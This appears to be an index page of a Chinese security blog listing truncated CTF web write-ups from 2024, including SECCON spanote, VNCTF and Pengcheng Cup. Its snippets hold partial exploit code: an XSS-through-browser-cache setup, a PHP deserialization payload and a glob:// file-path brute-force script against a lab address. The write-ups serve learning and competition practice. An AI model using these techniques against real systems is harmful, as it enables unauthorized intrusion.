📝 2024 📝
靜下心來尋找值得交付的熱愛
W4terCTF 2024 Web Writeup(出题)
出了简单题,旨在让新人学到东西
阿里云 CTF 2024 chain17
codeql yyds
beanFactory.getBean
兴致来了的安研(
VNCTF2024 Writeup
幸而天佑,竟获魁首
CVE-2024-2016
CVE-2024-2016 这个编号还挺好看的.jpg
SECCON 2022 spanote
看了一天,遇到好多问题,现在都把问题理清楚了
于是有了一份自己的 exp
如下
[SECCON 2022]spanote利用浏览器缓存
此处存在 xss,虽然是 GET,但是会检查自定义的 header,直接使用浏览器访问是 x 不到的
12345678fastify.get("/api/notes/:noteId", async (request, reply) => { const user = new User(request.session.userId); if (request.headers["x-token"] !== hash(user.id)) { throw new Error("Invalid token"); } const noteId = validate(request.params.noteId); return user.sendNote(reply, noteId);});
但是搭配剛剛講到的 cache 行為,你可以:
用 ...
鹏城杯 2023 初赛 Web Writeup
去年的鹏城杯,鄙人只做出来 1 题今年的鹏城杯,鄙人和队友一起做出来了 5/6 题
web1好简单的反序列化
12345$hacker = new Hacker();$h = new H();$h->username = $hacker;echo urlencode(serialize($h));
web2glob 协议爆破文件路径
123456789101112131415import stringimport requestsburp0_url = "http://172.10.0.5:80/"dic = string.digits + string.ascii_lowercaseres = ""for length in range(40): for i in dic: burp0_data = {"filename": "glob://./backdoor_" + res + i + "*"} r = req ...